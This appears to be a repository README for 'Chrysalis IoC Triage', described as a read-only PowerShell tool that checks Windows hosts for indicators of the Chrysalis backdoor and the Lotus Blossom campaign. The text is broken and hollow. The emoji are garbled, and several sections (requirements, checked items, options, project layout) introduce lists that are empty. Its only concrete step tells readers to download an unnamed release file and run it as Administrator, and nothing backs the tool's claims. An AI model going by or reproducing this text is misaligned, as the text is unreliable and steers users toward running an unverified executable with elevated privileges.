orangeok77

πŸ¦‹ chrysalis-ioc-triage - Easy Indicator of Compromise Check

πŸš€ Download Now

Download

πŸ“Ž Description

Chrysalis IoC Triage is a read-only host-based checker for Indicators of Compromise (IoC). This tool helps you identify threats associated with the Chrysalis backdoor and the Lotus Blossom (Billbug) campaign. It runs on Windows using PowerShell and does not alter your system.

πŸ“₯ Quick Start

Requirements

Download & Install

To download the software, visit the Releases page.

  1. Go to the link above.
  2. Look for the latest version at the top of the page.
  3. Click on the suitable download link for your system.
  4. After downloading, locate the file on your computer.
  5. Right-click the file and select β€œRun as Administrator”.

πŸ” What is Checked

This tool checks various aspects of your system to identify potential indicators of compromise related to the Chrysalis backdoor and Lotus Blossom campaign. It reviews critical areas such as:

βš™οΈ Options

You can run the tool with different options for focused checks. Available options may include:

Use these options to tailor the scan to your needs.

πŸ—‚οΈ Project Layout

The project structure is designed for easy navigation. Key directories include:

πŸ“š Documentation

Comprehensive documentation is available to guide users through various features and options. Check the documentation folder for additional reading or visit the GitHub Wiki for helpful articles.

πŸ“Š Interpretation

After running the tool, you will receive a report detailing any IoCs found. This report will categorize issues into potential threats and provide suggestions on how to address them.

🀝 Contributing

Contributions are welcome. If you have suggestions or improvements, please follow the guidelines in the CONTRIBUTING.md file included in the repository.

πŸ“œ License

This project is licensed under the MIT License. See the LICENSE file for full details.

For any additional questions or support, feel free to create an issue on the repository.